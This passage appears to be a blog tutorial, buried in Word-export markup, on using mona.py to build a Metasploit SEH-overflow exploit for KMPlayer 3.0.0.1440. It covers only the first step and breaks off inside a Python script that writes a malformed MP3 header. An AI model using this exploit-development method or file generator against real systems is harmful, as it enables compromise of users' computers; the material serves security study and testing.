UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--> <div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Mona.py is plug-in for Immunity Debugger which is developed by <a href="https://www.corelan.be/">Corelan Team</a>. It is a successor of pvefindaddr which is retired after the release of mona.py. </div><div class="MsoNormal" style="text-align: justify;"><br />
</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;">You can get more information about mona.py <a href="https://www.corelan.be/index.php/2011/06/16/mona-1-0-released/">here</a> & <a href="http://redmine.corelan.be/projects/mona">installation</a> & <a href="http://redmine.corelan.be/projects/mona/wiki">usage</a>.</div><div class="MsoNormal" style="text-align: justify;"><br />
</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;">While testing buffer overflow exploits for “The KMPlayer 3.0.0.1440” (exploits <a href="http://www.exploit-db.com/exploits/17364">here</a> & <a href="http://www.exploit-db.com/exploits/17383">here</a>), I noticed that it is vulnerable to SEH exploitation as well.</div><div class="MsoNormal" style="text-align: justify;"><br />
</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Here is how I crafted a metasploit module using !mona in only 3 steps. </div><div class="MsoNormal"><br />
</div><div class="MsoListParagraph" style="margin-left: .25in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -.25in;"><b style="mso-bidi-font-weight: normal;"><span style="mso-bidi-font-family: Calibri; mso-fareast-font-family: Calibri;"><span style="mso-list: Ignore;"><span style="font: 7.0pt "Times New Roman";"></span></span></span></b><b>1. Identify SEH Overflow</b></div><div class="MsoNormal"><br />
</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;">According to exploits reported at <a href="http://www.exploit-db.com/">www.exploit-db.com</a>, KMPlayer is vulnerable to buffer overflow when supplied specially crafted MP3 file.</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="text-align: justify;">Let's create a MP3 file.</div><div class="MsoNormal" style="text-align: justify;"><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--> </div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">#!C:/Python27/python.exe</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">import os;</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">header = "\x77\x44\x37\x03\x00\x00\x00\x00\x1F\x76\x54\x49\x54\x32\x00\x00\x13\x16\x00\x00\x00\xD6\x6D\x61\x73\x68\x69\x6E\x67\x20\x54\x68\x65\x20\x4F\x70\x70\xFA\x6E\x52\xCC\x74\x86\x41\x4C\x42\x00\x00\x00\x15\x00\x00\x00\xE7\x65\xE1\x65\x6E\x64\x20\x4F\x66\x20\x54\x68\x65\x20\x42\x6C\x61\x63\x6B\x20\xE3\x68\x61\x77\xEF\x72\x6D\x61\x54\x52\x13\x4B\x70\x00\x00\x3E\x00\x00\x00\x34\x8C\xA5\x45\x52\x73\x00\x00\x05\x00\x00\xD2\x32\xDC\x30\x39\x54\x43\x4F\x4E\x00\x00\x00\x0C\x00\x00\x00\x1A\x50\x79\x63\x16\x65\x64\x65\x6C\x69\x9B\x65\x60\x69\x4D\x81\x00\x00\x3C\x00\x32\x00\xEC\x6E\x67\xCD\x55\x50\x45\x54\x45\x4E\x43\x63\x00\x00\xEB\x00\x00\x70\x4C\x61\x6D\x65\x20\x33\x2E\x7A\x37\x54\x4C\x41\x4E\x00\x96\x00\x08\x00\x00\x00\x45\x79\x67\x6F\x69\x73\x68\x50\x7C\x49\x56\x00\x99\xDB\x29\x00\x00\x57\x4D\x3C\x4D\x54\xDB\x69\x61\x43\x6C\x61\x73\x85\x53\x65\xDB\x6F\xE1\x64\x61\x72\x79\x68\x44\xF6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAE\x00\x00\x00\x00\x00\x50\x52\x49\xCF\x00\x00\xE6\x27\x00\x00\x57\x4D\x2F\x4D\x65\xE6\x69\x61\x43\x6C\x61\x73\x73\x50\x32\x69\xC0\x61\x72\x79\xC0\x44\x00\xBC\x51\x4D\x30\x23\xE3\xE2\x4B\x86\xA1\x48\xA2\xB0\x28\x44\x1E\x50\x52\x49\x56\x00\x00\x00\xAA\x0B\x00\x57\x9A\x2F\x50\x72\x6F\x1E\x69\x50\xA1\x72\x00\xC3\x00\x4D\x00\x47\x79\x00\x00\x50\x52\x49\x56\x00\x00\x00\x1F\x00\x00\x57\x6C\x2F\x57\x4D\x4E\x6F\x6E\x74\x65\x6E\xF7\x49\x44\x00\x03\x6A\x21\x12\x66\x52\x4D\x49\x93\x83\xD6\x39\xB3\x6E\x1A\x76\xA6\x52\x49\x56\xC2\x20\x00\x57\x00\x00\xA2\x4D\x2F\x57\x59\x43\x25\x6C\x6C\x65\x0C\x74\xE2\x8E\x6E\x1F\x44\x01\xEC\x4B\xF3\xAB\xEB\x1C\xD1\x4C\xBF\x29\x8F\x8D\xC3\x7D\xA2\x74\x50\x52\x49\xC3\x00\x4E\x00\x27\x83\x00\x57\x4D\x2F\x57\x4D\x43\x6F\x6C\x6C\xC6\x63\x74\x69\x6F\x6E\x47\x72\x6F\x75\x70\x49\x44\x00\xEC\xFA\xF3\xAB\xEC\x1C\xD1\x4C\x90\x22\x8F\x8D\xC3\x06\xA2\x0F\x54\x50\x55\x42\x00\x00\x38\x08\x00\x50\x00\x48\x59\xEE\x6D\x65\x67\x61\x50\x1F\x49\x56\x